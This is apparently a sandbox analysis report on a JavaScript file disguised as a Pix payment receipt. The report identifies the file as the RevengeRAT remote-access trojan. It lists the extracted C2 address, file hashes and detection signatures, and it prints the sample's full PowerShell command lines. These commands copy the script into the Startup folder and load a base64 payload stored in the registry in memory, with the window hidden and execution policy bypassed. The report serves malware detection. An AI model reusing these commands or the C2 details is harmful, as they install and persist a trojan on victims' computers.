Analysis
-
max time kernel
107s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14-09-2024 20:26
Static task
static1
Behavioral task
behavioral1
Sample
XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js
Resource
win10v2004-20240802-en
General
-
Target
XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js
-
Size
119KB
-
MD5
5f05f5c7e4e19da45e124065d6f5fd1e
-
SHA1
12be89e5beb8ad794235f16bf29dc36a56d012af
-
SHA256
6a73361430e34020149356188f953f8910380c14f7c27c32a29892d049c7db22
-
SHA512
2776bd209d50a93a17077c958f31378c1972b054e6aa42a398fc1a9a1f5c69bd8b79d04fd46a07b1b65996c2b6bf6c3032c95e09009655532e62e6540403d5a6
-
SSDEEP
1536:0+fUYZPT8sYJHkWF5qBKoy1XtczvzYFNW+Nn:nfLasWHtuY1XtcbsFNW+Nn
Malware Config
Extracted
revengerat
NyanCatRevenge
18.231.150.177:5222
282ac7d305
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 14 3540 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid Process 4548 powershell.exe 1556 powershell.exe 3540 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exewscript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
powershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid Process 4548 powershell.exe 4548 powershell.exe 1556 powershell.exe 3540 powershell.exe 1556 powershell.exe 3540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
wscript.exepowershell.exewscript.exedescription pid Process procid_target PID 3444 wrote to memory of 4548 3444 wscript.exe 83 PID 3444 wrote to memory of 4548 3444 wscript.exe 83 PID 4548 wrote to memory of 4896 4548 powershell.exe 85 PID 4548 wrote to memory of 4896 4548 powershell.exe 85 PID 4896 wrote to memory of 1556 4896 wscript.exe 86 PID 4896 wrote to memory of 1556 4896 wscript.exe 86 PID 4896 wrote to memory of 3540 4896 wscript.exe 88 PID 4896 wrote to memory of 3540 4896 wscript.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js'));wscript 'C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" "C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\XFlejNFoyONPrRKTeOGM-Comrpovante de pix 14092.js'))"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mastercoca').mastercoca;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
59KB
MD5e9dd8e7412f2f40bf00bbb0e40055a40
SHA1718625814199c7b89012f21564c46298c72ba698
SHA256fa317dc427e8220fb94c7cad40a0f513462d46851477b4c1cdef7bc49eb9a7e2
SHA512c0501746cd0bd537dc7ae13b8e34c543c84eeb84b34ae6f4c49f8b4d395becd4595e0dad95c0f24631cb8a29232d0f1a4047ede54a49b5213ecaba4d6224728e